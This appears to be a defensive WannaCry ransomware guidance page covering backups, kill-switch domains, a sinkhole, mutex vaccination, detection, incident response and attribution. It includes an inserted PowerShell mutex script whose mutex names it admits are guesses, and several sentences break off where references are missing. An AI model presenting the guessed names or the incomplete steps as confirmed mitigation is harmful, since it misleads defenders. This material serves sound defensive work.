Do not forget that backup servers can be a target too. Make sure the backup retention period is long enough.

Backups must be off-line (detached from network connectivity or system connectivity).

Use a dedicated backup solution that is not using SMB!

Do not block the kill switch domains

No, you should not. When the malware is able to reach the kill-switch domain it will not spread further. When you block this domain, it will continue spreading, both internally and externally, and start encrypting your files.

Log network, system and service events so that you know what is going on

Centrally log the events of your servers and workstations so that you know what is going on. Combine this information with network events.

Use threat intelligence data / alerts on these events.

Setup internal WannaCry sinkhole website

The Wannacry ransomware is not proxy aware. This means that organizations that use a corporate proxy will not benefit from the kill switch. See

The solution is to add the kill switch domains to an internal RPZ zone and redirect requests to an internal sinkhole. Note that the ransomware expects an HTTP reply, so the sinkhole has to answer as a web server.

Scan and filter all mails with executable content

Note: no sample of the phishing e-mail that delivered the ransomware has been found (so far). Not sure about initial attack (maybe infected USB introduced on network?).

Disable macro scripts from Microsoft Office files transmitted via e-mail.

Good security practice.

Inform your employees

Repeat awareness campaigns!

Update your anti virus definitions

Update your anti-virus definitions to prevent further infections. Anti-virus definitions need time to include the new variants : do not rely on your anti-virus / anti-malware solution as the single line of defense.

UPDATE : It is important to note that anti-virus can potentially stop such attacks, even before researchers have seen a sample, ref. Modern Security Software not powerless against threats wannacry.

Create the mutex that is used by WannaCry to prevent further infection

A script has been developed by CCN that prevents the ransomware from starting to encrypt your files. It does this by creating the mutexes for which the ransomware checks. Note that the script needs to be run at every reboot (a named mutex only exists while the process that created it is running). Also see :

Afterwards, you can check for the presence of the mutex with : handle -a | findstr MsWinZonesCacheCounterMutex. The Handle command can be downloaded from Sysinternals :

Further info on the mutexes is available at and here

There is an alternative tool (not tested) that accomplishes the same :

UPDATE Another tool to create the mutexes, TearSt0pper.
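As an added example (not code from the original page, the CCN script or TearSt0pper), the script below holds the WannaCry mutex for as long as the process lives and provides a check equivalent to the handle.exe/findstr command above. The full mutex names are an assumption: the page only shows the MsWinZonesCacheCounterMutex prefix, so verify the names against the CCN script before relying on this.

```powershell
# Added example: hold the mutex WannaCry checks for, and verify it is present.
# Mutex names are an assumption (page shows only the prefix MsWinZonesCacheCounterMutex).
function Test-MutexPresent {
    param([Parameter(Mandatory)][string] $Name)
    try {
        $m = [System.Threading.Mutex]::OpenExisting($Name)
        $m.Dispose()
        return $true
    } catch [System.Threading.WaitHandleCannotBeOpenedException] {
        return $false
    } catch [System.UnauthorizedAccessException] {
        return $true     # exists, but owned by another user / session
    }
}

function Start-MutexVaccine {
    param([string[]] $Names = @('MsWinZonesCacheCounterMutexA', 'Global\MsWinZonesCacheCounterMutexA'))
    $held = @()
    foreach ($name in $Names) {
        $createdNew = $false
        # initiallyOwned = $true; $createdNew tells us whether the mutex already existed
        $handle = New-Object System.Threading.Mutex($true, $name, [ref]$createdNew)
        if (-not $createdNew) {
            # Either an earlier run of this script, or the malware itself: investigate
            Write-Warning "$name already existed on this host"
        }
        $held += [pscustomobject]@{ Name = $name; CreatedByUs = $createdNew; Handle = $handle }
    }
    return $held
}

$vaccine = Start-MutexVaccine
$vaccine | ForEach-Object {
    [pscustomobject]@{ Name = $_.Name; CreatedByUs = $_.CreatedByUs; Present = (Test-MutexPresent -Name $_.Name) }
}

# The mutex disappears when this process exits, which is why the CCN script has to run
# again after every reboot. Keep the process alive (e.g. as a scheduled task at startup).
while ($true) { Start-Sleep -Seconds 3600 }
```

Like the kill-switch domains, this is a vaccine against the known variant only; a sample with a different mutex name ignores it.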

Subscribe to threat intelligence feeds / community work

Subscribe to a threat intelligence feed to get early indicators and detection. See MISP platform

NSE Script to detect ms17-010

An NSE script for NMAP to detect the MS17-010 was published

What is the WannaCry / Wcry / WannaCrypt ransomware?


A massive wave of ransomware that has all the characteristics of a worm. It utilises an exploit called ETERNALBLUE as well as leveraging a persistent backdoor known as DOUBLEPULSAR (both were part of the Shadow Brokers leak of NSA tools). ETERNALBLUE exploits a vulnerability in the Microsoft SMBv1 protocol. Exploiting this vulnerability allows an attacker to execute code on the vulnerable host.

Microsoft patched this vulnerability in March 2017, via MS17-010. Microsoft also released a patch for systems that were no longer under support.

The malware is persistent, meaning it will survive a system reboot!

Infection methods

Although there are claims that the infection happened via phishing e-mail, no sample of such a mail has been analyzed.

Incident response

Unplug the infected machine from the network

Segment and isolate networks that have infected machines.

Limit SMB connections

Limiting SMB connections to your file servers will hugely affect your users, because they will not be able to access the file servers. There is, however, no reason for workstations not to filter incoming SMB connections. This will prevent further spreading.

Look for other signs of infection

Do not pay the ransom

Restore backups

Inform your local / national CERT

For Belgium : [email protected]

Recovery encrypted files

There may be a possibility to recover the encryption key (and hence the encrypted files) on Windows XP, if the system was not rebooted after infection.

According to WannaCry - Decrypting files with WanaKiwi + Demos, the decryption works for both Windows XP (x86 confirmed) and Windows 7 (x86 confirmed). This would imply it works for every version of Windows from XP to 7, including Windows 2003 (x86 confirmed), Vista, 2008 and 2008 R2.

In order to decrypt the files it is important that

Do not delete the encrypted files yet, it might be possible that a decryption key may become available at some point in the future. There are however no guarantees that this will be possible.


Lazarus group

According to Kaspersky Lab there is strong evidence linking the WannaCry ransomware code to North Korea. There is a code overlap between WannaCry and a sample attributed to Lazarus in 2015. Note that the Lazarus group is believed to be responsible for the Sony wiper attack, the Bangladesh bank heist and the DarkSeoul operation. ... a false flag theory, "although possible, is improbable."

Manually linking payments with encryption

WannaCry uses only four individual bitcoin addresses. There is no automatic link between a payment and an infection, meaning that the validation has to be a manual process. Most ransomware automates this process to provide a better "service" to its victims. Also see the Wired article.



A live map can be found here :

Create a mutex manually in PowerShell (replace TestMutex with the WannaCry mutex name; the mutex only exists as long as the PowerShell process that created it is running) : $mtx = New-Object System.Threading.Mutex($false, "TestMutex")

Maintained by cudeso